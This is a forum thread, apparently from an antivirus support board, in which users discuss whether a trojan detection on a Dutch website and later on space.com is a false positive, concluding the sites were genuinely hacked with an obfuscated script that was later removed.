HTML:IFrame-KT [Trj] False Positive?

The current Vps version (091207-0) detects the above trojan when opening this URL: hXXp://www.andiamovespa.nl

I’m told by people who are more knowledgeable than me, that this is a false positive. Can somebody please confirm this?

Thanks … Fogie

Hi Fogie, welcome to the forum :slight_smile:

Could you please modify your link to make it unclickable (i.e. chage http to hXXp) to prevent others potentially becoming infected.

This kind of detection is very common these days, with many ‘legitimate sites’ becoming hacked to distribute malware:

Every 3.6 seconds a website is infected

It seems that the data.js may have been hacked.

12/7/2009	4:11:57 PM	1260202317	SYSTEM	1404	Sign of "HTML:IFrame-KT [Trj]" has been found in "hXXp://www.andiamovespa.nl/data.js" file.

I cannot see it as it is obfuscated, but I would suggest that they do check it out, as it can be a potential risk.

Maybe someone else will have a better description.

-Scott-

Scott

Thanks for the quick reply.

The link has been edited.

Thanks for your analysis; we’ll see if someone comes up with something more definitive.

Fogie

Well There is a whole page of obfuscated scripts trying to be loaded (hXXp://wXw.andiamovespa.nl/data.js)and that is what avast is alerting on, see image1.

Since it is obfuscated, I don’t understand its intentions, but avast has in the past been very accurate on these type of alerts.

See image2 to get an idea of the obfuscated scripts inside the data.js file which tries to load on opening the andiamovespa.nl home page.

So someone at the site needs to check out that data.js file, if it is in fact meant to be there.

David

Thanks for your input. I’ll see if I can get somebody to contact them (I don’t speak Dutch).

Fogie

The normal webmaster @ website name, etc. if that got through should be fine in English I would have thought as HTML/Javascript are English scripting languages. Not to mention the Dutch seem to have a good multi lingual skills.

A message to webmaster @ andiamovespa.nl bounced. I’ll see if I can find somebody who can read the home page.

Edited to disable the e-mail address

If you can edit your post removing the email, whilst it bounced, it could still be harvested by a spambot trawling for email addresses. That is why I broke mine up.

Hi Fogie,

Probably they are cleaning: (Level: 1) Url checked: (script source)
hXtp://www.andiamovespa.nl/data.js
Blank page / could not connect
No ad codes identified

Not Found

The requested URL /data.js was not found on this server.

Apache/2.2 Server at wXw.andiamovespa.nl Port 80

polonus

Thanks for everybody’s interest, but I think this topic has been beaten to death. Somebody has said they’ll contact the site owner; so, let’s let this thread die.

Thanks again to all.

Edit: BTW, avast (with the same signature file) no longer detects the trojan.

Yes, because there is no call to the data.js file on the page and the data.js file is no longer on the server at that address.

I am getting this same supposed trojan from space.com :-\

Yes, it seems one of the php files has been hacked…

12/10/2009	11:37:07 PM	1260488227	SYSTEM	1492	Sign of "HTML:IFrame-KT [Trj]" has been found in "hXXp://www.space.com/common/js/community.php" file.

So this really isn’t a false positive? :o

Yes, it is most likely a genuine detection

cool, seems the webmasters have fixed it ;D